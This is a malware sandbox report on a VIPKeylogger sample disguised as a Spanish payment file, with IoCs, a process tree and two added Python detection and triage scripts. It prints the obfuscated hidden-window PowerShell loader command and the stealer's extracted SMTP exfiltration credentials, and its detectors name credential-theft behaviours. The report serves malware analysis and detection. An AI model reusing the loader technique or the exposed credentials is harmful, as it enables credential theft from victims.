Analysis
-
max time kernel
292s -
max time network
273s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted
23-10-2024 13:33
Static task: static1
Behavioral task behavioral1: Sample PAGO FRAS. AGOSTO 2024..exe, Resource win7-20240729-en
Behavioral task behavioral2: Sample PAGO FRAS. AGOSTO 2024..exe, Resource win10v2004-20241007-en
Behavioral task behavioral3: Sample Vesperkost.ps1, Resource win7-20241010-en
Behavioral task behavioral4: Sample Vesperkost.ps1, Resource win10v2004-20241007-en
General
-
Target
PAGO FRAS. AGOSTO 2024..exe
-
Size
900KB
-
MD5
d2bb55d90b4fe13d981297c8f452e810
-
SHA1
e35c73e93bef613a1aa1cb7707b8cde2489df897
-
SHA256
a286c68d65f2582414caf8229aeaba8365d7b84de92c5da4c39b7482136b5271
-
SHA512
875819a87d64cee9a3d9f4e9afb84adca711d72d7b8a5b3837cd22abff017e57434b8a0de7502118e2a16aaada2d3ab4d89a3cc8db0207d22278ae6046ef4547
-
SSDEEP
24576:obu96/xtr62ldmWFZD6lm7Pytae6/B1Gl:vC3tmKZgm7OjGB1Gl
Malware Config
Extracted
Family: vipkeylogger
Protocol: smtp
Host: smtp.ionos.es
Port: 587
Username: [email protected]
Password: Comercialplastico3.
Email To: [email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and information stealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.
-
Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
Runs PowerShell with its display window hidden.
Processes:
  pid 2820  powershell.exe
  pid 4720  powershell.exe
-
Accesses Microsoft Outlook profiles (1 TTP, 6 IoCs)
Processes: msiexec.exe (two instances); each key below was opened twice:
  Key opened  \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  Key opened  \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
  Key opened  \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
-
Blocklisted process makes network request (16 IoCs)
Processes:
  pid 4548  msiexec.exe  flows 20, 24, 26, 29, 35, 65, 66, 67
  pid 4584  msiexec.exe  flows 21, 23, 27, 30, 34, 54, 57, 63
-
Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
-
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow 53  checkip.dyndns.org
-
Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
Processes:
  pid 4584  msiexec.exe
  pid 4548  msiexec.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger (4 IoCs)
Processes:
  pid 4720  powershell.exe
  pid 2820  powershell.exe
  pid 4548  msiexec.exe
  pid 4584  msiexec.exe
-
Drops file in Windows directory (4 IoCs)
Processes: PAGO FRAS. AGOSTO 2024..exe
  File opened for modification  C:\Windows\resources\Nebengeschfter.ini
  File opened for modification  C:\Windows\resources\0409\gildes.lak
  File opened for modification  C:\Windows\Fonts\thyrididae.ini
  File opened for modification  C:\Windows\resources\0409\diaspidine.Inq
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery (1 TTP, 5 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  PAGO FRAS. AGOSTO 2024..exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
-
Suspicious behavior: EnumeratesProcesses (20 IoCs)
Processes:
  pid 2820  powershell.exe  (9 events)
  pid 4720  powershell.exe  (7 events)
  pid 4584  msiexec.exe  (2 events)
  pid 4548  msiexec.exe  (2 events)
-
Suspicious behavior: MapViewOfSection (2 IoCs)
Processes:
  pid 4720  powershell.exe
  pid 2820  powershell.exe
-
Suspicious use of AdjustPrivilegeToken (46 IoCs)
Processes:
  pid 2820  powershell.exe  and  pid 4720  powershell.exe, 22 token entries each: SeDebugPrivilege (twice), SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  pid 4584  msiexec.exe  SeDebugPrivilege
  pid 4548  msiexec.exe  SeDebugPrivilege
-
Suspicious use of WriteProcessMemory (14 IoCs)
Processes:
  PID 1404 (PAGO FRAS. AGOSTO 2024..exe) wrote to memory of PID 2820 (powershell.exe)  x3
  PID 1404 (PAGO FRAS. AGOSTO 2024..exe) wrote to memory of PID 4720 (powershell.exe)  x3
  PID 4720 (powershell.exe) wrote to memory of PID 4584 (msiexec.exe)  x4
  PID 2820 (powershell.exe) wrote to memory of PID 4548 (msiexec.exe)  x4
-
outlook_office_path (1 IoC)
Processes:
  Key opened  \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
-
outlook_win_path (1 IoC)
Processes:
  Key opened  \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  msiexec.exe
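The signatures above describe four behaviours that are cheap to hunt for in endpoint telemetry: a hidden PowerShell that dot-invokes a variable, msiexec.exe started by PowerShell with no installer arguments, a process other than a mail client opening the Outlook profile keys, and traffic to an IP-lookup service or an SMTP port from that same process. The Python below is an added example, not part of the sandbox report, that encodes those checks and runs them over constructed Sysmon-style events; the event field names, the explorer.exe parent, the benign rows and the mail-client allow list are assumptions, while the pids, images, command lines, registry keys, hosts and port are taken from the report.

```python
"""Detection logic for the behaviours in the report's signatures (added
example, not part of the sandbox report).

Events are simplified Sysmon-style records (an assumed schema):
  process  : image, parent_image, cmdline, pid
  registry : image, key, pid
  network  : image, dest_host, dest_port, pid
"""
import ntpath
import re

# Keys the report shows msiexec.exe opening: any Office version's Outlook
# profile store and the Windows Messaging Subsystem profile store.
OUTLOOK_PROFILE_KEY = re.compile(
    r"\\Software\\Microsoft\\(?:Office\\\d+\.\d+\\Outlook"
    r"|Windows NT\\CurrentVersion\\Windows Messaging Subsystem)\\Profiles\\",
    re.IGNORECASE,
)
IP_LOOKUP_HOSTS = {"checkip.dyndns.org"}            # from the report
SMTP_PORTS = {25, 465, 587}                          # 587 is the extracted exfil port
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}    # assumed allow list; tune per estate


def _image(path):
    """Lower-cased file name of an image path (msiexec.exe from its full path)."""
    return ntpath.basename(path or "").lower()


def hidden_powershell_dot_invoke(ev):
    """powershell.exe started with a hidden window and a '.$name(' dot-invocation."""
    cmd = ev.get("cmdline", "")
    return (ev.get("type") == "process"
            and _image(ev.get("image")) == "powershell.exe"
            and re.search(r"-w\w*\s+hidden", cmd, re.IGNORECASE) is not None
            and re.search(r"\.\s*\$\w+\s*\(", cmd) is not None)


def msiexec_spawned_by_powershell(ev):
    """msiexec.exe whose parent is PowerShell and whose command line is the bare
    image path: no /i, /x or /q switch, so no installer work justifies it."""
    if ev.get("type") != "process" or _image(ev.get("image")) != "msiexec.exe":
        return False
    if _image(ev.get("parent_image")) != "powershell.exe":
        return False
    bare = ev.get("cmdline", "").strip().strip('"').lower()
    return bare.endswith("msiexec.exe")


def outlook_profile_read_by_non_mail_client(ev):
    """A process that is not a mail client opening Outlook profile keys."""
    return (ev.get("type") == "registry"
            and _image(ev.get("image")) not in MAIL_CLIENTS
            and OUTLOOK_PROFILE_KEY.search(ev.get("key", "")) is not None)


def suspicious_network(ev):
    """External-IP lookup, or SMTP from a process that is not a mail client."""
    if ev.get("type") != "network":
        return None
    if (ev.get("dest_host") or "").lower() in IP_LOOKUP_HOSTS:
        return "external_ip_lookup"
    if ev.get("dest_port") in SMTP_PORTS and _image(ev.get("image")) not in MAIL_CLIENTS:
        return "smtp_from_non_mail_client"
    return None


def detect(events):
    """Return sorted (rule, pid) pairs for every event that matches a rule."""
    hits = set()
    for ev in events:
        pid = ev.get("pid")
        if hidden_powershell_dot_invoke(ev):
            hits.add(("hidden_powershell_dot_invoke", pid))
        if msiexec_spawned_by_powershell(ev):
            hits.add(("msiexec_spawned_by_powershell", pid))
        if outlook_profile_read_by_non_mail_client(ev):
            hits.add(("outlook_profile_read_by_non_mail_client", pid))
        rule = suspicious_network(ev)
        if rule:
            hits.add((rule, pid))
    return sorted(hits)


# Constructed telemetry. Pids, images, command lines, key and hosts come from the
# report; the explorer.exe parent and the two benign rows are invented.
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
MSI = r"C:\Windows\SysWOW64\msiexec.exe"
PROFILE_KEY = (r"\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000"
               r"\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676")
SAMPLE_EVENTS = [
    {"type": "process", "pid": 2820, "image": PS,
     "parent_image": r"C:\Users\Admin\AppData\Local\Temp\PAGO FRAS. AGOSTO 2024..exe",
     "cmdline": '"powershell.exe" -windowstyle hidden "$Brankedes=Get-Content -raw '
                "'C:\\Users\\Admin\\AppData\\Local\\peritonealizing\\nomadeinvasioners\\stofhandskernes\\Vesperkost.Ufo';"
                '$Udskibningshavnene=$Brankedes.SubString(28086,3);.$Udskibningshavnene($Brankedes)"'},
    {"type": "process", "pid": 4548, "image": MSI, "parent_image": PS, "cmdline": '"' + MSI + '"'},
    {"type": "registry", "pid": 4548, "image": MSI, "key": PROFILE_KEY},
    {"type": "network", "pid": 4548, "image": MSI, "dest_host": "checkip.dyndns.org", "dest_port": 80},
    {"type": "network", "pid": 4548, "image": MSI, "dest_host": "smtp.ionos.es", "dest_port": 587},
    # benign rows (constructed): Outlook reading its own profile, a real install
    {"type": "registry", "pid": 5100, "key": PROFILE_KEY,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"},
    {"type": "process", "pid": 6200, "image": MSI, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": 'msiexec.exe /i "C:\\Users\\Admin\\Downloads\\tool.msi" /qn'},
]


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:<40} pid {pid}")
```

The msiexec rule keys on the empty command line rather than on the injection itself, because a bare `msiexec.exe` launched by a script host has no legitimate purpose and is visible in plain process-creation logs, whereas the NtCreateThreadEx and WriteProcessMemory activity in the report needs kernel-level telemetry to observe.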
Processes
-
C:\Users\Admin\AppData\Local\Temp\PAGO FRAS. AGOSTO 2024..exe  (PID 1404)
  command line: "C:\Users\Admin\AppData\Local\Temp\PAGO FRAS. AGOSTO 2024..exe"
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2820, child of 1404)
    command line: "powershell.exe" -windowstyle hidden "$Brankedes=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Vesperkost.Ufo';$Udskibningshavnene=$Brankedes.SubString(28086,3);.$Udskibningshavnene($Brankedes)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\msiexec.exe  (PID 4548, child of 2820)
      command line: "C:\Windows\SysWOW64\msiexec.exe"
      - Accesses Microsoft Outlook profiles
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 4720, child of 1404)
    command line: "powershell.exe" -windowstyle hidden "$Brankedes=Get-Content -raw 'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Vesperkost.Ufo';$Udskibningshavnene=$Brankedes.SubString(28086,3);.$Udskibningshavnene($Brankedes)"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\msiexec.exe  (PID 4584, child of 4720)
      command line: "C:\Windows\SysWOW64\msiexec.exe"
      - Accesses Microsoft Outlook profiles
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
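The PowerShell command line in the process tree never names the cmdlet it runs: the loader reads Vesperkost.Ufo as a single string, cuts a 3-character substring out of it at offset 28086 and dot-invokes that substring with the whole file as its argument, so the verb lives inside the payload rather than in any process-creation log. The Python below is an added example, not code from the report or from the malware; it parses that command-line pattern and recovers the verb from a copied-out payload. The payload used here is constructed (28086 filler characters followed by `iex`); the real Vesperkost.Ufo was not recovered, so the actual verb being `iex` is an assumption.

```python
"""Static triage of the report's PowerShell loader (added example, not the
report's or the malware's own code).

The loader never names the cmdlet it runs.  It reads a payload file as one
string, slices a short substring at a fixed offset and dot-invokes that
substring with the whole file as its argument:

    $blob=Get-Content -raw '<path>';$v=$blob.SubString(<off>,<len>);.$v($blob)

The verb (and the stage it executes) therefore live inside the file.  The
functions below recover them from a copied sample of that file.
"""
import re
from typing import Callable, Optional

# Command line exactly as recorded in the report's process tree (pids 2820/4720).
LOADER_CMDLINE = (
    r'"powershell.exe" -windowstyle hidden "$Brankedes=Get-Content -raw '
    r"'C:\Users\Admin\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Vesperkost.Ufo';"
    r'$Udskibningshavnene=$Brankedes.SubString(28086,3);.$Udskibningshavnene($Brankedes)"'
)

# Generic form of the trick: variable names, path, offset and length are free.
_LOADER_RE = re.compile(
    r"\$(?P<blob>\w+)\s*=\s*Get-Content\s+-raw\s+'(?P<path>[^']+)'\s*;"
    r"\s*\$(?P<verb>\w+)\s*=\s*\$(?P=blob)\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)\s*;"
    r"\s*\.\s*\$(?P=verb)\s*\(\s*\$(?P=blob)\s*\)",
    re.IGNORECASE,
)


def parse_loader(cmdline: str) -> Optional[dict]:
    """Return the payload path and the SubString window, or None when the
    command line does not use the Get-Content / SubString / dot-invoke pattern."""
    m = _LOADER_RE.search(cmdline)
    if m is None:
        return None
    return {"path": m.group("path"),
            "offset": int(m.group("off")),
            "length": int(m.group("len"))}


def hidden_verb(blob: str, offset: int, length: int) -> str:
    """Mirror .NET String.SubString(offset, length) on the payload text.

    The window is counted in characters.  Windows PowerShell 5.1 (the 32-bit
    v1.0 binary in the report) decodes a BOM-less file with the ANSI code
    page, so the character offset equals the byte offset; a UTF-8 decode of a
    file containing multi-byte characters before the window would shift it."""
    if offset < 0 or length < 0 or offset + length > len(blob):
        raise ValueError("SubString window lies outside the payload")
    return blob[offset:offset + length]


def decode_loader(cmdline: str, read_text: Callable[[str], str]) -> Optional[dict]:
    """Parse the command line, load the payload through read_text (so the path
    can be remapped to a copied-out sample) and name the verb that would be
    dot-invoked on the whole file."""
    info = parse_loader(cmdline)
    if info is None:
        return None
    blob = read_text(info["path"])
    info["verb"] = hidden_verb(blob, info["offset"], info["length"])
    info["payload_chars"] = len(blob)
    # With iex / Invoke-Expression the whole file is the next stage, so the
    # file itself, not the command line, is what to decode or detonate next.
    info["whole_file_is_stage"] = info["verb"].lower() in {"iex", "invoke-expression"}
    return info


# Constructed stand-in for Vesperkost.Ufo (the real file was not recovered):
# 28086 filler characters so that the 3-character window at 28086 reads "iex".
# That the real verb is "iex" is an assumption made for this example.
CONSTRUCTED_PAYLOAD = "#" * 28086 + "iex" + "\n# remainder of the staged script (constructed)\n"


def triage_report_loader() -> Optional[dict]:
    """Run the decoder on the report's command line against the constructed payload."""
    return decode_loader(LOADER_CMDLINE, lambda _path: CONSTRUCTED_PAYLOAD)


if __name__ == "__main__":
    print(triage_report_loader())
```

Because the verb is pulled from a fixed character offset, any edit to the payload file before that offset (adding a comment, re-encoding the file) breaks the loader; conversely, an analyst who has the file can read the verb without running anything, which is why parse_loader is paired with a reader callback instead of opening the path on the infected host.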
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize  854B
MD5       e935bc5762068caf3e24a2683b1b8a88
SHA1      82b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256    a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512    bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize  1KB
MD5       f5c9938a2fa3fc7c84debe9b5699bd85
SHA1      698dde95fa540adaedf8c6c475730896609a8fd0
SHA256    2d21778bc0d4f0798a5c652a62f2971db17dcf2462b0c13d89bd02de1d6df3f3
SHA512    4dfee6086310236069239716570f6d0c63946a01b62e644447d9f6c5c3231e50b9041cc6a4d1378d58a6f694520a825e7abf98fc501c519750602ccfebd3479b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize  471B
MD5       ed2bc277627fe9729bb6e14fc0ca8651
SHA1      45904821d33b90391b60e1c78283343b40167f79
SHA256    7d3aa148aa339df14b24d65c7ec460b0bec9067dee838ef9a48a1028e393a99b
SHA512    e02dd1357820ef6824580e5d9277ffcaa8540f936ae076de3dca4a61c2ab4ad0b4d1b024a171473bbd65bd8a9cf27f46167f3f38be04d56280b7348abe23440a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize  472B
MD5       452e11716ea4843afe2f66561e31bed5
SHA1      36e2c61b5ead22352683945567e75f3bfbfc6b3c
SHA256    9daa8523616103e9dd1f7ba52b95b16fcf1b6935d43488db6abf5467dceab917
SHA512    b9089c671248e5a4b47742756da9837ae49da54a9cd3072624266adaaf69bcc32dabde6fcd1b7529ec6fefa3b127ec745ce425f3de22bc3cff1b922be8075d89
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize  170B
MD5       d6a67fabbd0da544d79604ce9cc07023
SHA1      6431440f7647206de6c662464c5aeaead28e3167
SHA256    3151e5f33207f802c425da74fba923160244e55048fc4e7f5a24444a7a539e6b
SHA512    7eda85646ced1fc8efccb5ad5a26aa08cce99196538f11fa3b86fb8c7ab2051dcf32737f1cd7e22c3a89edd9b852523faf0bd889e037b1fa58436a1e70d59dfe
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize  170B
MD5       34ce4de4155618418db109be37cc95fc
SHA1      b6e0b8d43da27ebf7e19acb19d861e422b64c1d2
SHA256    4949ff9229d6973b268e4ac7b6fd03ffc2e08522d997669455533db076e68c05
SHA512    224210d1fe02ae93fbead46ef9ad1465b5a54c2188ba49401e8004f5f8cb55dda59f9cdaebdf659e04f456d05bfa9466c44f19bce29dc9660e2dd03df87c1c8b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize  410B
MD5       054e6fced6e5b25e0cca1d6dbd763af1
SHA1      182c525d8daea565724119b05271bf9c344a0886
SHA256    fddb5d5f0a5faae4dd7850c38e3e1698b95b7c4887bd4d9cada562119297c2a8
SHA512    43dbdee046e226aa39099029283376f09af75fece05d6a1aa4e4370744ea19b20af32ad4013968f8d8bfa532a81b16d2b83ec696cba5bf872e7bf3b1d6f975f1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize  406B
MD5       c9bb529f59c3dfc426933fe06bef1ae8
SHA1      8c7f45a44ec7160540329b746203c1bacbe62354
SHA256    b2da0f494a5a85a94e748bb02eb9150b082819d0ac2b8c69f674a01b4e15a0bb
SHA512    f6f9333aa15bfd4d619387e3cc74313fb317b63d10611880540956ea60dabce885ba0dcd42c44f4e5bcd8682a17a7cbb2ad35dee4f98d7315d042f515cd634c6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize  402B
MD5       2a946bb5a9196938c244b82aa07e7181
SHA1      4cfc5e1fe499b515608b49b6725d41b7d2e109cc
SHA256    6a4de8d0125c7d09a030a1ab175682dd95cf3be9960b900670827bd7f24bdc92
SHA512    fa708036b79dc368bf87d86739febe7881c304df301ca813e81771479aa4c51ab71423c7d926d518a6526c4b3924a73e7cb27710c0dfad9bbfcd13ac1a76c1e9
-
Filesize  775B
MD5       fb241d07e8b3558780b49a931067493f
SHA1      ed95b20fead530b5877817a20a8b629cd25f95b5
SHA256    62ad1d76ff6fd74fb79518f040a9f3b8823bb2d02c59b99d0e26a1f186c6e298
SHA512    a848644033ea3b2066de5847b1201ee6b766ea7405ba1adc7565c8e4dacc26513a4564b6d65850fe4bd49c84391bc5a5241b8603fa56cfb72352ac06dd621c8c
-
Filesize  60B
MD5       d17fe0a3f47be24a6453e9ef58c94641
SHA1      6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize  303KB
MD5       dcbe6272699402aff5f14d475bdd8542
SHA1      c4c05fa37bba0a92ec4238ed9f139011571f9893
SHA256    36f696e2b4fdc6beb4f8cdea8d264c7b92a40604f90660715f11aa341c7009a8
SHA512    b84f173f8c09118f6146fc3c1cc647cfd0e31845ab8641ce50056befa6199c10785fa17e3e42aa56a27263e3fbd638ef758dacfc3ebae6506ebce64a3d512c5e
-
Filesize  53KB
MD5       e35283bacb62d15976b5841105b466a1
SHA1      0203661c08ae261483cd9da1c21d7173f8ea329d
SHA256    d6a7990b9c733d4ba3b1b0d2e5e42dfa2253b22fe345f4870bf24686c516788d
SHA512    9a0fbd409e74472330f6ec78e453af0825704d3d1f132657b6f8f32f738d51dc70a4124edade7c0fe3c6cc48c6774f8d822d4207d7e5f0879ae386df3e9521e6
-
Filesize  32B
MD5       53898e643bd3e0ca22a462325ad62da4
SHA1      e0f08a75fa5219f39e49c1b9f361119905da7d02
SHA256    b947991000aea669ebfeadfb12de45121d46ad3dfd02296f373f9bf8ce4f1aff
SHA512    aa17b99a93a04f7bbbb92f34c15921da80e20592a39b3921f1d3cc59fae55f66196b2be4f56716846daff041253cb63d7e373b84234d451181c87f1d097fe8ca